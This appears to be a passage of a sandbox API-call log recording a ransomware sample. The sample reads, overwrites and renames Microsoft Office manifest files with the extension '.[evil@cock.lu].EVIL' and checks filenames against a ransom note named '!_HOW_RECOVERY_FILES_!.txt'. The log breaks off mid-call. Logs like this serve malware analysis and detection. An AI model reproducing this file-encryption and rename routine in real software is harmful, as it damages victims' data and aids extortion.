[0099.914] wcsstr (_Str="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.914] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 105 [0099.914] wcscmp (_String1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.914] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 0x0 [0099.914] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 0x69 [0099.914] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.916] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x926, lpOverlapped=0x0) returned 1 [0099.922] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.922] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.922] _errno () returned 0x84b1160840 [0099.922] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.922] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x940, lpOverlapped=0x0) returned 1 [0099.922] CloseHandle (hObject=0x1a0) returned 1 [0099.923] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.923] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.923] __uncaught_exception () returned 0x84b1160800 [0099.923] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.923] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.923] ??_V@YAXPEAX@Z () returned 0x1 [0099.926] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.926] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.926] wcsstr (_Str="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.926] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 105 [0099.926] wcscmp (_String1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.926] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 0x0 [0099.926] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 0x69 [0099.927] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.928] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x926, lpOverlapped=0x0) returned 1 [0099.962] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.962] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.962] _errno () returned 0x84b1160840 [0099.962] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.962] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x940, lpOverlapped=0x0) returned 1 [0099.962] CloseHandle (hObject=0x1a0) returned 1 [0099.962] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.962] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.962] __uncaught_exception () returned 0x84b1160800 [0099.962] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.963] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.963] ??_V@YAXPEAX@Z () returned 0x1 [0099.966] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.966] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.966] wcsstr (_Str="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.966] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 105 [0099.966] wcscmp (_String1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.966] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 0x0 [0099.966] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 0x69 [0099.966] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.968] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x351c2, lpOverlapped=0x0) returned 1 [0100.011] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.011] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.011] _errno () returned 0x84b1160840 [0100.011] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.011] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x351e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x351e0, lpOverlapped=0x0) returned 1 [0100.012] CloseHandle (hObject=0x1a0) returned 1 [0100.012] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0100.012] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0100.012] __uncaught_exception () returned 0x84b1160800 [0100.012] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0100.013] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0100.013] ??_V@YAXPEAX@Z () returned 0x1 [0100.016] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0100.016] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0100.016] wcsstr (_Str="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0100.016] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 105 [0100.016] wcscmp (_String1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0100.016] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 0x0 [0100.016] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 0x69 [0100.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0100.017] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x50a, lpOverlapped=0x0) returned 1 [0100.465] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.465] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.465] _errno () returned 0x84b1160840 [0100.465] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.465] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x520, lpOverlapped=0x0) returned 1 [0100.465] CloseHandle (hObject=0x1a0) returned 1 [0100.466] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0100.466] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0100.466] __uncaught_exception () returned 0x84b1160800 [0100.466] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0100.466] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0100.467] ??_V@YAXPEAX@Z () returned 0x1 [0100.471] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0100.471] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0100.471] wcsstr (_Str="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0100.471] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 105 [0100.471] wcscmp (_String1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0100.471] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 0x0 [0100.471] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 0x69 [0100.471] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0100.506] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x5f6, lpOverlapped=0x0) returned 1 [0100.711] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.711] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.711] _errno () returned 0x84b1160840 [0100.711] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.711] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x600, lpOverlapped=0x0) returned 1 [0100.711] CloseHandle (hObject=0x1a0) returned 1 [0100.711] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0100.711] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0100.711] __uncaught_exception () returned 0x84b1160800 [0100.711] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0100.712] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0100.712] ??_V@YAXPEAX@Z () returned 0x1 [0100.715] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0100.715] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0100.715] wcsstr (_Str="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0100.715] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 105 [0100.715] wcscmp (_String1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0100.715] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 0x0 [0100.715] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 0x69 [0100.715] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0100.717] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x571a8, lpOverlapped=0x0) returned 1 [0100.839] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.839] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.839] _errno () returned 0x84b1160840 [0100.839] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.840] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x571c0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x571c0, lpOverlapped=0x0) returned 1 [0100.840] CloseHandle (hObject=0x1a0) returned 1 [0100.840] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0100.841] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0100.841] __uncaught_exception () returned 0x84b1160800 [0100.841] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0100.841] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0100.842] ??_V@YAXPEAX@Z () returned 0x1 [0100.845] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0100.845] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0100.845] wcsstr (_Str="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0100.845] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 105 [0100.845] wcscmp (_String1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0100.846] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 0x0 [0100.846] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 0x69 [0100.846] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0100.850] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x3e03, lpOverlapped=0x0) returned 1 [0100.857] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.857] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0100.857] _errno () returned 0x84b1160840 [0100.857] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.857] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3e20, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x3e20, lpOverlapped=0x0) returned 1 [0100.857] CloseHandle (hObject=0x1a0) returned 1 [0100.858] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0100.858] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0100.858] __uncaught_exception () returned 0x84b1160800 [0100.858] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0100.858] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0100.859] ??_V@YAXPEAX@Z () returned 0x1 [0100.865] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0100.865] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0100.865] wcsstr (_Str="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0100.865] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 105 [0100.865] wcscmp (_String1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0100.865] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 0x0 [0100.865] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 0x69 [0100.865] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0100.866] ReadFile (in: 